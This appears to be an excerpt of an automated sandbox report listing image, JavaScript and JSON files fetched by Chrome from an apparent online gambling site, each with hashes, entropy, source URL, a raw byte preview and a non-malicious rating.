                                                                                                                                                          SHA-512:A48871EA2F2122AC264FDCCAEEFA1D52D9434C0DF72E9F5A913896F997C779E87C34B6E8DEA694CE7206E571B1D639B240A3ED1DAE875770B2321B334BE4B2D0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://www.image110.com/uploads/f5056584ed4cee1f2c0b461e38ee3629.jpg
                                                                                                                                                          Preview:......Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop CS6 (Windows).2022:11:18 20:17:21..........................N...........Q...........................................&.(.........................................H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 169 x 40, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):9042
                                                                                                                                                          Entropy (8bit):7.964019168291545
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:L2YBZ0VdWTqSddi3uRMpqw98ZATWQqN8EDpTYMudKAjDXNIjKT:aYBZ0Vs2cdi3umvyZKDqqEpTYzdKAXXp
                                                                                                                                                          MD5:F006CC3E0E8073BF28AE6E3F829304D1
                                                                                                                                                          SHA1:E7FA10F49BF76DA97B1EEC09BB55ABDAA501D3C9
                                                                                                                                                          SHA-256:1DCFEA900DFC2C117BD3E4D16FF721EA2BA54357690219B936E6875B365483C9
                                                                                                                                                          SHA-512:5C8478652DD3BB94F6EDD83BB93BDA4C864CFB621C22CFB4AE2AC041C0D7FD555352C44901CD603641D16CE093D5442098F697B03CDB6B4CE27C8463A9910FEC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/footer/logo_bvi_normal.png
                                                                                                                                                          Preview:.PNG........IHDR.......(......9.R.. .IDATx^.|...E..[K.]gK&.dB.A.EA..EQ@......A ,a..Lf.{...-.!.|l.*..((..... ...B....>w...N.p..!@..w...s...U....}.}...B.)......dg..}.p.w.e.......M.*P.7.J_u{\.....L.;..V.....@{..~....3GF..!.....,f...b..N....`.../..\Q.)Q.k....;..|.*#.7....o....t.....{..}C.@(8...-.4..(!..zaddH.d.X.....BI........#...pj...I..L..}{.'.~OG..A......6..`..`.Amm-.....mp{< ..f..8.J...@.0..Cee%....K...Bn...<8..o.O.m.J.^...N..7G.cAz.....\#..TW.....o.....c(.J...e.Q5]W.(A+.....9....@..N.....z.....4.L...}s.'.zOF.#Az....r..7\.5@...V...1..d@5...7.4M..;v@. mR..p....BUU.....s.`@@.....\n.(.0kf..2......u....-H/..`M...u..Tw........]..0.).\...C>......t.l.V.m*.W..3.\.*.....e..,@H@)....f\.....^......|..W.kZ20<:..T.z!_...*.......P..K...h.....RS.,.u..$K.,..h.....R....m........o.6@.a......?.I..8.o...@Z.._.e.Uno%.(.....l .....v28u.8...hLb..).rpp@.S.LQ..u...`KE.....I)....X:[..S...2..f...i.n.^...~....ikk..w..... &..E./..A......m.Q..&.4!.....7.T.mTy\N.Qm..B%[z.f.2...>
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):20027
                                                                                                                                                          Entropy (8bit):7.963371497875305
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:ITa1uA+fOWplgEF9zASXi/D/tvBmkNr8rG5mn3kMFen:ITaC5peEj01Q8r75CzFen
                                                                                                                                                          MD5:CFF93AD3AF5B98A472DCD451E0E50CAC
                                                                                                                                                          SHA1:2DF7BB9E726A9992EFBF691D69661D84F96AB5B9
                                                                                                                                                          SHA-256:CB9A7B35081FE5D28C85E543DC38AE3E8174FCD9A228094C4E29FE96C57BD6B9
                                                                                                                                                          SHA-512:3784694E01625E7A473962E4D71BC9947A94870B5E1041E93677A59B8FFD8D28C89792139CF7631561CD2C8C368B6148E9D64910C3673B413C9189E6B5FE4C03
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/video/sunbet_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BDA0C9838D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BDA0C9828D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 80 x 80, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):4625
                                                                                                                                                          Entropy (8bit):7.9479129975388165
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:hhofsY4tB5xAQbGDvutqlhKhnulFQ/DUkmyIs8OIF0ITuS:Qf4tB5mQbmvsOAsa/D3VPY0IL
                                                                                                                                                          MD5:9BEE125647B10E926174FDF6C7497DDF
                                                                                                                                                          SHA1:502D58F0EF8B4D51F87D38FF6B38EEB4F7C340FE
                                                                                                                                                          SHA-256:B539ABBE5B071C6B5804374F88E6B2FACAFA9653AB8C19919CF30E1EA049650C
                                                                                                                                                          SHA-512:36782B06148C8EA35CE718C3631E17FADAAA4305F2025BDF175F714718BE4D861F6C75CFB2B7A988E1DA65404F3190B661B0B5491D2E4C4A611B1D5AA23E2C1E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...P...P.............PLTE...}..W....E..K..Q..=..E...w.3..7..6..%y.H...t./..C..&}.-~.7..;....W..)|.s..*.....}.....4..A..c..#s.L......n.e..$u....e.. r.:...j..F....s.../y..`..X.....M..L.F..D..0v.T...^..........@..n..<~..c.,{.D...P.5}.(u..f..f....C..X..(..;..'x.._..@.i.....p..B...X..Q..Q..V..J.B..B..h..k..&z..[..W....I..?..>..>...c..e.e...Z....Q..M..9..$r..N..<....p...o..T..M..H..F..C.Z..+..^..2..&q..k.....S._........^.9x..^..T..+vT.._..,..j..,..$}..q..f..5.....f..i..m....K..@..._.._..A....a..V....>..2...g..(o...\..M..<...;.......<...2..G..2...k.......w..I.....o..g..H.....R..2.....o......../k..v.J..B.......A|.1q..w..h.......@..?..9...u..3..3{..........${..i.(X.;..&..(g.:..S......O...#a./d.+..`.....R..{..Cs..@.......8..........(........pBv.<i.+B].=.z.5.r7.pI.S..%......I...#tRNS.....x.........UR..U..zvaT..^&....;....IDATX...k.p.......I..i.K..S.;n.=;Us2..B...[F..e%-y.tH.b.*.X`v.B...d.Ta..DOB/.?...n.b_........q.."..o)...|a.$0..LG.A..xD...q..E...........
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 944 x 67, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):6296
                                                                                                                                                          Entropy (8bit):7.932958317989278
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:JS96Zd9ZAjMzbLLdEuDSdirCMm9FL6i9j8sURTLAQs:w+9ZAjUb1EuDScrJuLB8zR/AQs
                                                                                                                                                          MD5:C85B246A11C0EB5E4AD77FFFF19901BB
                                                                                                                                                          SHA1:9F4DD0682C391BAFACFFEA95C14234AF5610A800
                                                                                                                                                          SHA-256:C0635F27FE30BFEDD2EDF64ADD3B2F7239D7DE96DB812B78986AC778EF58F120
                                                                                                                                                          SHA-512:18E330E17D3A6414F3BC45AF49D35E548EA840F1ECA243FDED7D6B3302ACE36A17459804948B2F2CD846F299748E2911F659798AD7F0ACF001D8675F1B9FC1C5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/index/383/hot/pay_n.png
                                                                                                                                                          Preview:.PNG........IHDR.......C......S......sRGB...,.....pHYs................=IDATx..{PU.~..M..N.;&.........G.w....1"".E.#>...h..(.[..._..|......}$7....t...i.O:.i...w....}....f.Y...o.s....o..o.........U.0l..1.;..}.s.._6V...tr.......Y..!..B.!........?.^..X.1.tKV...C..!=...{.a}z..C{..YCD....W..l......{.....Dw....._..`>@:.....On~...-.7....xf[.........p..^.;.W...j...\>0.....U.....x.s...1..4..............iO.+..|...'.3....?.^..V...7r..o.z....g..V._.^s..w.....u........k.;..B../..`>@<CEAT...=..=Dl.b..^"i|_.xF....!.'....I...I..un..V$............>r...{.]..#..o.!...*6,.+.........s.>.+..N.J....o.m.+>^9Y...-.&.ly...#.xET..>..n}...'.........1C. ..|.x..MQ}......}.+..."...Y.....+.........1C. ..|.x...G..".....d..M..&...5..!..n...k.....}..3........H...u...\..jK..$Z.....t]8X....b.~At.......#................W....=....k.;..B../.n0. .b.~O#.p_\N....#.u.{&]...Dw....._..a>@<E.`]...."X...L.........1C. :.|.x......Ot.>@.......x......Ot.>@.......x......Ot.>@.......x......Ot.>
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (57212), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):57212
                                                                                                                                                          Entropy (8bit):5.96791735433038
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:bgtq+6jfAEMmU0PGo9KhuiaAc73LtPAFpIwe:7LfhhU1sriaNL5ADi
                                                                                                                                                          MD5:D3C921A5D728B64E494470536D9E16F3
                                                                                                                                                          SHA1:7E54A88B23A6CEF830F88892334037C1C85C4C4F
                                                                                                                                                          SHA-256:BED5E0787FE3F5EB912A33759EB74D06959AAB37C8222F74142C238931871054
                                                                                                                                                          SHA-512:4FF471125C0CF275C0018EBE606A3B51B0DCA718D001D803F5214E2BC40EA0858397D454483CBDCDEE68EE97EBD6E2DFAA90EAA54D890C3242FA1231C5E4EE7C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/slides.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATAdgFYBdAGgG8BBAMyQEYAuagVzRgBcBLdTd0zgJTkAvqQDmARzgAvJqw7c0vfqSRCAblABOAAhCk0pFAG4AhCzZceUIQCJmSEDqTstnDreNoAvNiSZbAAZOAAUAC1sBMnUUTgATHUDvZMwUb1sLBXRbZPYATwgQFGpMEG8bAH4QADooCAgAGzzMTgMBBhABAB8u3mqQAA8IFC12JG8UAWFMTKsldjsHJxc3D2NNXU5vYE40OJRgaoBlBvc4HpFjFu9ZxUwNbR0twOMtEHZmLTQdW54kUk65A2OkMaXYYU4SGMKGqcRA1CgzAaY285FgMBASCQnDAnFO+QYpkCpCgcTqXHUIAAEiBOGIwuxCXQSfUQHtKFotAckAx2Jg1CzCnsACIoMa8/kCEmc7mE4lQJAAOSg6gAYiMGGgkQ1SBA3uoOVzgAwAOQAHjAzHY7HQOhgDQV41sSFO8AAtHqQOpbDptJwoG6HWAQA10iF9dwHD78oV0pbrdkAHzhr2RpBmgD08ZtaETJoMg3YhoOpotVpzdodWPSLrObrQhZ9foDQZD6UVjZ0MbKtmzSY7A3Ymb7ufziJtjSgeSZJKtKEneSOhRAcQYAGYQGvSBi0OwQFoALIoOEznd7rQhUlxXZiBi2QiBCADWzbrEAUQVIDvIE/L5gDhtABbS8xBvORLDuVo1HIN4Pi+LtMHNEcuwKHsRx9DM8wEao90HfkAGo6CmUh9nFUxmVIpAAGEqx5Z1XTgN1KJfOItCgMQxCgMAGi/IkAQVMDbFOBttBfFcxBAVVVjmBhqjXQhSARE9yMUlB/yQAB5NAjhDEAOBnag1IcLSqLCKA0AkmddmoXZOD3OV+DQOz/QaE54i/YkHWkPIABkUFJO90DhQDzLiF9AJQXEeNVTgtBcGdoCWLSqRQSktAcxLHC09V1IyxEsrQUUxhStKZzeJBhj2AAVFA7x2PYDhf
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 155 x 155, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):44229
                                                                                                                                                          Entropy (8bit):7.979031888400956
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:yxMsu3tqNNaNRYOGKwZfJpORgjVxD8dsqJFWz9hG/UHRjqO9vfT8Pq:ZXdWNqGKarOYjwW9hMuBv78Pq
                                                                                                                                                          MD5:0BC3317E0C53FC8E1DFB1134A281F9E8
                                                                                                                                                          SHA1:89A21413159CBDEF355BBCA6F98AE6E5F7470A55
                                                                                                                                                          SHA-256:0A6FE83F7764AD9B5AA24C6A8F03F0380213E5225E8274A186C50DC02E976BD8
                                                                                                                                                          SHA-512:B74B3BD7DF326140DDD791C924455C8696B1E99ACC87E7D828EF80B21334FF59D2A9C8031095AEFBDFE7E632E9342AFC5020427B26753FBAF57BED571BD1CDB5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/liveCasino/02.png
                                                                                                                                                          Preview:.PNG........IHDR.............ua.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......IDATx...u.l.u....`S...A.H:...,.,.e..[&...1..I.$.q...e.-.......b...gx.qCU...{....$...K=O?=..{..V-x....>.w.L.=.z..^5%...e.I..........W..s_...C..O...A...*..6p........GT<}+8.s...3......:........?.....t..?.3- .s...3................e[...Z.......].=...j...E.....W...;..po@D..?...?3.{..g8P.......y.....t*....<~._.............r'..`.e`6...y....o.l....7..D. ..L....R..:./6E..I................Uc3w.W?..?+..>............ (../..;..p.y....H..\.jD..P:.L..Y.9..G.".N\<.XB _G....E.*.[...d.......H.....QKV...|.h.B@..G....{.h...............S.4...@.....~B<.......>E.X0.......}.....t>...C.....{..)O.......+....r...D.....+.)0...@....T..@.K......Gf=8...a .8...........M.-Zg........>...O.p.{.a7.A@x...s...a@.Y.M..d...Z.Qo.|@...2.`.NMW{y*....Qz..........v..VBP..=....6.E.a.j......F.%....Ny...!....B!a.P.....=..B..T.T?....A....2....7_p.N..-...Zm.V~>...P#8
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 139 x 139, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):40589
                                                                                                                                                          Entropy (8bit):7.985652243898314
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:pCc5c+ZHTkEy45xQD4CeaI/LteVGSFd40j3NDi69rpPY+jnPM19kxlo8:pCcrkQuD4CeaIpOXNDi0PYWniV8
                                                                                                                                                          MD5:CD13824ADA9FC128D5C168EE98EC4343
                                                                                                                                                          SHA1:8AC2AE7A13D96199272E07C5A11DF537ED7EB88C
                                                                                                                                                          SHA-256:78F5D48D24758DAABAF709BBA9E51D442C54C418C32091ECAC7C4D4AE92C077F
                                                                                                                                                          SHA-512:954F230E7B804493A3FC172B0066845E1F8022F6B6C275553313D60BCE11160EA554EAA1493A735A5F1C53E490A58D1C0413C2EFC783D181226C08A0FFD1D17A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............Q.j.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......IDATx...u.].y.....aiFlK.l.2.1.l'N...fp.J.i{..bn1.5I..C.c....-.,.H....Mk.....Hv.j........x..........<...C"...[.?.................H.j.E{O..S..;.s..._w.............\...I.....F...7}..G!.?=..k..',.*..../..O.*A..x......._3....%....fr..D...;..vh.M$........^X...!.f.....$_.&.....B.. ...?....'~...........p....."...[!ev.D.k.wM....O.K&$.O....o|w.g!M. I......x...+...k..bA.>........A..{.m._d.3v.;.JZ.a.W...dCd.b.D"1..9...Z...w~...qbA>....X.u.Gd.+...CX...9,V.t..>j.n..."...}.m"l.$.a...^O...{...........{.../..e.y......Ld2.w...O.g.a.....x...y......@......B`....G. .X.d......W......Ax...`....;.bR.1....|Ibc...V.&8 ..'..Y......5...`1...o..*.....os..Q..N.%..../......1p..9..].A... .a......n..^`....<.~..........A.M!U .......j.y..,..K4zD`.\...T......{..E....s^.....~k.....q.+....T ......j...........4fA[<.>.5gq... <.......V>8%W>|.[..D.J,.#..iB..7..e~#..H.>..M
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):18388
                                                                                                                                                          Entropy (8bit):4.351571195978757
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:sPrmmNeqmORafrtTThDeJ+GgJttHVENDYXdk0hfbwSr:0rmFORstThDeJtgJtFVENMXdkMBr
                                                                                                                                                          MD5:AB2CBE8957927CF9923F1435AA517BC8
                                                                                                                                                          SHA1:C1F5439091C7914EE2E65D8E9E4DC31A17327AEC
                                                                                                                                                          SHA-256:36BFC70E4B7D8EE7D2C3687C8F704AE2021A8F1F61FF31AD71C6227C602391D7
                                                                                                                                                          SHA-512:9A51747CC8D842CDF60CD433964529A5CBDD02E83D2972D8059B5935F7EF912757FF4461E757B5F662195F22A86B65F7969151BF9DAA303B5F55FF483C6C6266
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://ocsapi1961.hydqef.com/ocs/zbw?r=5552162052
                                                                                                                                                          Preview:{. "nnn": "outer-888",. "versions": {. "zb_m": "240606-01",. "zb_pc_member": "240529-01". },. "http": {. "CDN_PATHS": ["zb-qq.gzjqwlkj.com","zb1-hw.qectyoua.com","zb-hw.czwygs.com"],. "API_DOMAINS": ["ocsapi-lc.tingmeikj.com","ahd-ocssn.qqxgo.com","wssa-341.dalianjrkj.com:1585","ocsapi-aws.huayidm.com","wssa-381.moceand.com:1985"]. },. "https": {. "CDN_PATHS": ["zb-qq.gzjqwlkj.com","zb1-hw.qectyoua.com","zb-hw.czwygs.com"],. "API_DOMAINS": ["ocsapi-lc.tingmeikj.com","ahd-ocssn.qqxgo.com","wssa-341.dalianjrkj.com:1586","ocsapi-aws.huayidm.com","wssa-381.moceand.com:1986"]. },. "public_domain": ["cppublbyv2-ali.epie3d.com", "cppublbyv2-hw.zjbxxy.com", "cppublbyv2-ty.huliancc.com"],. "gb_app_ins_domains": ["appiso-ty.souzhanzx.com:1066", "appiso-ty.zvbzjsb.com:8066"],. "gb_plist_api_domains": ["qpplist.lcyj888.com"],. "gb_wx_proxy": "https://wy-ali.meriksenrusso.com",. "gb_disabled_proxy": true,. "gb_is_pc_sp
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):8660
                                                                                                                                                          Entropy (8bit):7.938769116394221
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:dFtxTmQ0e4lW0/fxEYjCQEPhFBDhZct65SsP1w23aPWDg:dzxTmQT4UMxEUKhFBVKt65DTU
                                                                                                                                                          MD5:00212624EF0DB6F68405D135FFAF474F
                                                                                                                                                          SHA1:D3C3CAB4FE64A70A2DEBD296AD1A7051E323756A
                                                                                                                                                          SHA-256:5BD110DA02753D599DC1314D4C11A3698649CAB80B4B58520640A4BEC3B2AA7D
                                                                                                                                                          SHA-512:75EE984B4DE69DABDBC8ED90DE1D7B3401A21E1704152A692AA1FA0DB63474FA2C46ACFC74CDB7E2785D4893456CC4AD2497375F53422810BB80A39E1615FC7A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-b/sport_ky.png
                                                                                                                                                          Preview:.PNG........IHDR...<...<.....:..r....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.566ebc5b4, 2022/05/09-08:25:55 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:CBE3BC19494711EDA266BC5E66CD7936" xmpMM:InstanceID="xmp.iid:CBE3BC18494711EDA266BC5E66CD7936" xmp:CreatorTool="Adobe Photoshop 22.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:F6322158DFF911EC86CF9D25D0D01E00" stRef:documentID="xmp.did:F6322159DFF911EC86CF9D25D0D01E00"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.<.....DIDATx..{..\e........]..I...d'$........((:...(. ....#......*y....!....Y:.....U].z.ns........7.>R.u..|.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 126 x 126, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):8233
                                                                                                                                                          Entropy (8bit):7.929034685181108
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:Ni2BogUn5J/6U6tfoPXuRyXHDqV4ao7rSSd0n+PfAWSOHF:M2Bu5ufcHDqVg7rSSd0n+VSkF
                                                                                                                                                          MD5:1EE686662FABBE56F3B9121165711200
                                                                                                                                                          SHA1:A29909B8E0FB497A1F0C8A836A9CB0FD3615C165
                                                                                                                                                          SHA-256:82A0B19600B0DDD59C0533E1B1617A51C881ABE362F98CB8831C5F4BC7ACBC65
                                                                                                                                                          SHA-512:D87CACB9C220958BE17792BAAD63D784178A9739E7EE039D379DCD192D5F5EB19BFC1E149426FAEA837468163FB36B9A2E25DD6FB3F198F245CDA86CCE94EB13
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-b/sport_txg188.png
                                                                                                                                                          Preview:.PNG........IHDR...~...~......#......tEXtSoftware.Adobe ImageReadyq.e<...yiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c001 79.c0204b2def, 2023/02/02-12:14:24 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:69efbb1a-3bd0-48ce-bc29-05262a938de2" xmpMM:DocumentID="xmp.did:619A798CE7F811ED9EEBA4794D9649A2" xmpMM:InstanceID="xmp.iid:619A798BE7F811ED9EEBA4794D9649A2" xmp:CreatorTool="Adobe Photoshop 24.4 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:41ef85f0-da2a-433b-ab6f-51b6974e027f" stRef:documentID="xmp.did:69efbb1a-3bd0-48ce-bc29-05262a938de2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..$2...FIDATx..]...E......$ 1..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 140 x 144, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):43964
                                                                                                                                                          Entropy (8bit):7.9904992398227375
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:768:L6pQJ/SZ4Nr40bLKt7hN2rcU9/4jaDJI0NgCqabh2H3gsrGkVmkY:L6OJ6ZWr4gLu7hNkcU9bNtqK+rGvZ
                                                                                                                                                          MD5:EF00277A830F44BC4AF5434E41955F40
                                                                                                                                                          SHA1:465EDFA57900DF3F498B85677739B5FF6BEFAD90
                                                                                                                                                          SHA-256:663315C849B61C943D46F2625DAA87FAE6714923DE2FBE4B232A477653423CA3
                                                                                                                                                          SHA-512:5F73125F5ECEF344976D5AFB1D1010F6B0FE8F07066EBA02081669B36EDA0B0F628EBC581DCCDF2E794FDF5E692049FD5E1A247AC2D31567FAF2AA476B6B7DFB
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/lottery/lotto03.png
